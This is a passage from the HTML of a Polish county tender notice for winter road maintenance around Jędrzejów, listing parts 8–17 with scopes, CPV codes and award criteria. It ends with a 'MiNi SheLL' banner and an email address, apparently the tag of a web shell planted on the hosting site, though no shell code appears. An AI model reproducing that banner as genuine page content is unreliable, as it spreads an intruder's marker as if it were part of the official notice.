- droga powiatowa nr 0164T odc. Wolica-Raków           
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
Teren i sprzęt w dyspozycji Obwodu Drogowego w Małogoszczu.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim                         /własność wykonawcy/, plac, materiał zamawiającego - szt. 1 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 45 000 km.
Praca sprzętu dla Zadania 6-10  będzie obejmowała teren:
1.	Gmina Małogoszcz  wszystkie drogi powiatowe na terenie gminy
2.	Gmina Oksa  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Nagłowice - wszystkie drogi powiatowe na terenie gminy
4.	Gmina Sobków - wszystkie drogi powiatowe na terenie gminy
5.	Gmina Jędrzejów:
- ulica powiatowa Przypkowskiego w Jędrzejowie   
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
- droga powiatowa nr 0164T odc. Wolica-Raków           
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
Teren i sprzęt w dyspozycji Obwodu Drogowego w Małogoszczu.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim                         /własność wykonawcy/, plac, materiał zamawiającego - szt. 1 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 45 000 km.
Praca sprzętu dla Zadania 6-10  będzie obejmowała teren:
1.	Gmina Małogoszcz  wszystkie drogi powiatowe na terenie gminy
2.	Gmina Oksa  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Nagłowice - wszystkie drogi powiatowe na terenie gminy
4.	Gmina Sobków - wszystkie drogi powiatowe na terenie gminy
5.	Gmina Jędrzejów:
- ulica powiatowa Przypkowskiego w Jędrzejowie   
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
- droga powiatowa nr 0164T odc. Wolica-Raków           
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
Teren i sprzęt w dyspozycji Obwodu Drogowego w Małogoszczu.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim                         /własność wykonawcy/, plac, materiał zamawiającego - szt. 1 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 45 000 km.
Praca sprzętu dla Zadania 6-10  będzie obejmowała teren:
1.	Gmina Małogoszcz  wszystkie drogi powiatowe na terenie gminy
2.	Gmina Oksa  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Nagłowice - wszystkie drogi powiatowe na terenie gminy
4.	Gmina Sobków - wszystkie drogi powiatowe na terenie gminy
5.	Gmina Jędrzejów:
- ulica powiatowa Przypkowskiego w Jędrzejowie   
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
- droga powiatowa nr 0164T odc. Wolica-Raków           
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
Teren i sprzęt w dyspozycji Obwodu Drogowego w Małogoszczu.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>Usługi dotyczące zimowego utrzymania dróg wykonywane ładowarką o wydajności                   min 8 m3 /godz /własność wykonawcy/ - 1 szt<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 900 godzin.
Sprzęt w dyspozycji Obwodu Drogowego w Małogoszczu.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>12
                  
                <b>Nazwa: </b>Odśnieżanie przy użyciu pługa ciężkiego dwustronnego  na nośniku ciężkim                                  /własność Wykonawcy/  1 szt<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Świadczenie usług przy zimowym utrzymaniu dróg  w dyspozycji Zamawiającego 
pod nadzorem Zarządu Dróg Powiatowych w Jędrzejowie.
Przewidywany zakres robót wynosi 8 100 km.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>13
                  
                <b>Nazwa: </b>Odśnieżanie przy użyciu pługa ciężkiego dwustronnego  na nośniku ciężkim                                 /własność Wykonawcy/  1 szt.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Świadczenie usług przy zimowym utrzymaniu dróg  w dyspozycji Zamawiającego 
pod nadzorem Zarządu Dróg Powiatowych w Jędrzejowie.
Przewidywany zakres robót wynosi 8 100 km.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>14
                  
                <b>Nazwa: </b>Odśnieżanie przy użyciu pługa ciężkiego dwustronnego  na nośniku ciężkim                                 /własność Wykonawcy/  1 szt.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Świadczenie usług przy zimowym utrzymaniu dróg  w dyspozycji Zamawiającego 
pod nadzorem Zarządu Dróg Powiatowych w Jędrzejowie.
Przewidywany zakres robót wynosi 8 100 km.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>15
                  
                <b>Nazwa: </b>Odśnieżanie przy użyciu pługa ciężkiego dwustronnego  na nośniku ciężkim                                 /własność Wykonawcy/  1 szt.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Świadczenie usług przy zimowym utrzymaniu dróg  w dyspozycji Zamawiającego 
pod nadzorem Zarządu Dróg Powiatowych w Jędrzejowie.
Przewidywany zakres robót wynosi 8 100 km.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>16
                  
                <b>Nazwa: </b>Odśnieżanie wykonywane równiarką z pługiem czołowym dwustronnym                                /własność Wykonawcy/   1 szt.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Świadczenie usług przy zimowym utrzymaniu dróg  w dyspozycji Zamawiającego 
pod nadzorem Zarządu Dróg Powiatowych w Jędrzejowie.
Przewidywany zakres robót wynosi 450 godzin.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>17
                  
                <b>Nazwa: </b>Zimowe utrzymanie dróg powiatowych w Powiecie Jędrzejowskim polegajce na ustawieniu i zdjęciu siatki przeciwśnieżnej.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a/ ustawienie zasłon przeciwśnieżnych  Przewidywany zakres robót wynosi 50 km
b/ zdjęcie zasłon przeciwśnieżnych  Przewidywany zakres robót wynosi 50 km
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com